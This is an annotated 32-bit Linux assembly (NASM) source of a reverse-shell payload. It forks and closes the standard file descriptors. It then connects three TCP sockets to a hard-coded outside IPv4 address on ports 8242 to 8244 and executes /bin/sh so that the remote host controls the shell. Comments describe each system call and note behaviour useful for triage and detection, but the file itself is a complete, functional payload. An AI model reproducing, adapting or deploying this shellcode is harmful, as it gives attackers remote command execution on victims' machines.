;-----------------------------------------------------------------------
; 32-bit Linux payload, NASM syntax, raw `int 80h` system calls.
;
; Behaviour as written:
;   1. fork (eax=2). The parent returns to its caller; the child continues.
;   2. The child closes file descriptors 0, 1 and 2.
;   3. The child calls bhcon three times; each call creates a TCP socket
;      and connects it to the hard-coded IPv4 address in bhcon, on ports
;      8242, 8243 and 8244 in that order.
;   4. The child execve()s "/bin/sh" with argv = { path, NULL }, envp = NULL.
;
; Observable behaviour for triage / detection: a fork followed by
; close(0..2), three outbound TCP connects to consecutive ports on one
; host, then execve of /bin/sh with a NULL environment.
;-----------------------------------------------------------------------
BITS 32
    xor eax, eax
    mov al, 2                   ; eax = 2 -> fork
    int 80h
    cmp eax, 0
    je child                    ; eax == 0 -> running in the child
    ret                         ; parent (or failed fork, eax < 0): back to caller

; Terminate the process. eax = 1 -> exit; ebx is not set here, so the
; exit status is whatever ebx holds on arrival (3 when reached from bhcon).
exit:
    xor eax, eax
    inc eax
    int 80h

; Child: close fds 0, 1, 2. The loop counter lives in the dword at [esp].
child:
    xor ebx, ebx
    push ebx                    ; counter = 0
l0:
    mov ebx, [esp]              ; ebx = fd to close
    mov al, 6                   ; close; only AL is written, so this relies on
                                ; the upper 24 bits of eax already being zero
                                ; (true after fork returned 0 / close returned 0)
    int 80h
    inc byte [esp]
    cmp byte [esp], 3
    je l1                       ; fds 0..2 done
    jmp l0
l1:
    ; Three connections, one per port. Presumably the new sockets take the
    ; just-freed descriptors 0, 1 and 2 (lowest-free-fd allocation), which
    ; would make them the shell's stdin/stdout/stderr -- not checked here.
    mov dx,8242
    call bhcon
    mov dx,8243
    call bhcon
    mov dx,8244
    call bhcon
    jmp mstr                    ; jump forward so `call havestr` can push the string address

; Entered via `call` from mstr: the return address on the stack is the
; address of the "/bin/sh" string that follows that call.
havestr:
    pop ebx                     ; ebx = pointer to "/bin/sh"
    xor eax, eax
    mov al, 11                  ; eax = 11 -> execve
    xor ecx, ecx
    push ecx                    ; argv[1] = NULL
    push ebx                    ; argv[0] = path
    mov ecx, esp                ; ecx = argv
    xor edx, edx                ; envp = NULL
    int 80h
    mov eax, 1                  ; only reached if execve returned (failed): exit
    int 80h
mstr:
    call havestr
    db "/bin/sh",0

;-----------------------------------------------------------------------
; bhcon: create a TCP socket and connect it to the hard-coded address.
; In:    dx = port, host byte order (the original comment said "di")
; Out:   returns only if connect returned 0; otherwise jumps to exit
; Clobb: eax, ebx, ecx, dx
; Stack: all scratch data is written BELOW esp ([esp-32]..[esp-1]) without
;        adjusting esp; the return address stays at [esp].
;-----------------------------------------------------------------------
bhcon:
    mov [esp-16], dx            ; stash the port for later
    mov dword [esp-12], 2       ; socket arg 0: domain   = 2 (AF_INET)
    mov dword [esp-8], 1        ; socket arg 1: type     = 1 (SOCK_STREAM)
    mov dword [esp-4], 0        ; socket arg 2: protocol = 0
    mov eax,102                 ; socketcall
    mov ebx,1                   ;   call 1 = socket
    mov ecx,esp
    sub ecx,12                  ;   ecx -> argument array at esp-12
    int 80h                     ; eax = new socket fd (not checked for error)
    xor ecx, ecx
    ; Build a 16-byte sockaddr_in at esp-32.
    mov byte [esp-32], 2        ; sin_family low byte  = 2 (AF_INET)
    mov [esp-31], cl            ; sin_family high byte = 0
    mov dx, [esp-16]            ; reload the port
    mov [esp-30], dh            ; sin_port, high byte first (network order)
    mov [esp-29], dl
    ; sin_addr: dword is stored little-endian, so memory holds 5c f0 ea 22,
    ; which reads as 92.240.234.34 in network order.
    mov dword [esp-28], 0x22eaf05c
    mov [esp-24], ecx           ; sin_zero = 0
    mov [esp-20], ecx
    ; connect arguments, again at esp-12 (overwrites the socket arguments).
    mov [esp-12], eax           ; arg 0: socket fd
    mov [esp-8], esp
    sub dword [esp-8], 32       ; arg 1: &sockaddr = esp-32
    mov dword [esp-4], 16       ; arg 2: addrlen = 16
    mov eax,102                 ; socketcall
    mov ebx,3                   ;   call 3 = connect
    mov ecx,esp
    sub ecx,12
    int 80h
    cmp eax, 0
    jne exit                    ; any connect failure ends the child (ebx = 3 here)

; Disabled in the source: would send the 4-byte marker 0xDEAD1234 over the
; socket in [esp-12] with write (eax = 4).
;    mov dword [esp-16], 0xDEAD1234
;    mov eax, 4
;    mov ebx, [esp-12]
;    mov ecx, esp
;    sub ecx, 16
;    mov edx, 4
;    int 80h

    ret